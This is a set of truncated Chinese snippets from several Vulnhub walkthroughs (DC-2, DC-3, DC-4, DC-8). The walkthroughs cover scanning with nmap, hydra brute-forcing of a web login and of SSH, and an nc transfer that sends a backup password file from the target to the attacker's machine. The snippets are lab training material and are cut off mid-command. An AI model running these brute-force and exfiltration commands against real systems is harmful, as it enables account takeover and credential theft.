一:信息收集 1:主机发现 arp-scan -I eth0 10.9.23.0/24 kali的ip 10.9.23.112 靶机的ip 10.9.23.52 2:端口扫描 nmap -A -p- -T4 10.9.23.52 3:端口探测 二:渗透测试 1:密码爆破 尝试九头蛇进行爆破 构建语句: hydra -l admin -P pass.txt 10.9.23.52 http-post-form "/login.php:username=^USER...
将这些密码复制下来并对jim进行ssh爆破,因为在信息手机阶段我们可以看到靶机是打开了22端口 这里可以用nc进行文件传输 代码语言:javascript 复制 # Kali nc-nvlp5555>old-passwords.bak #DC4nc192.168.229.1355555</home/jim/backups/old-passwords.bak 现在用hydra对jim账号进行SSH爆破 代码语言:javascript 复制 hydra-...
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 从靶机DC4靶机拿到shell 在提权,,,只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载: 官网地址:http://www.five86.com/downloads/DC-4.zip Vulnh...
一开始使用burpsuite,使用一个小字典进行爆破但是没有爆破出来,尝试用一个大字典来爆破,于是用了kali的usr/share/wordlist的rockyou字典,但是由于字典太大了导不进burpsuite,所以用hydra hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.241.160 http-form-post "/login.php:username=^USER^&password=...
靶机可从Vulnhub平台免费下载,并通过虚拟机在本地搭建,渗透实战是一个找寻靶机中的flag的过程,并以获得最终的flag为目标! 攻击机:Kali Linux 靶机环境:192.168.241.137 所用工具:nmap | hydra | Burpsuite 0x01 知识点 页面暴力破解 ssh爆破 teehee命令提权 ...
DC2-DC4:vulnhub靶机渗透测试 靶机环境及下载 dc1-dc6靶机下载地址:http://www.five86.com/ DC2靶机ip:192.168.56.160 DC3靶机ip:192.168.56.161 DC4靶机ip:192.168.56.162 说明:获取目标主机的flag 知识点 nmap扫描 hydra爆破 cewl密码生成 git shell
DC2-DC4:vulnhub靶机渗透测试靶机环境及下载 dc1-dc6靶机下载地址:http://t.cn/E9fGYHO DC2靶机ip:192.168.56.160 DC3靶机ip:192.168.56.161 DC4靶机ip:192.168.56.162https://www.anquanke.com/post/id/178658...
靶机下载: https://www.vulnhub.com/entry/dc-8,367/ 环境: kali:192.168.49.129 靶机:192.168.49.12 先arp扫描一下目标靶机的ip地址 发现192.168.49.12 nmap流程走一下 nmap 192.168.49.12 -p- -sV -sT -T5 -A 只开放了22和80 浏览器打开,发现是一个用Drupal搭的站... ...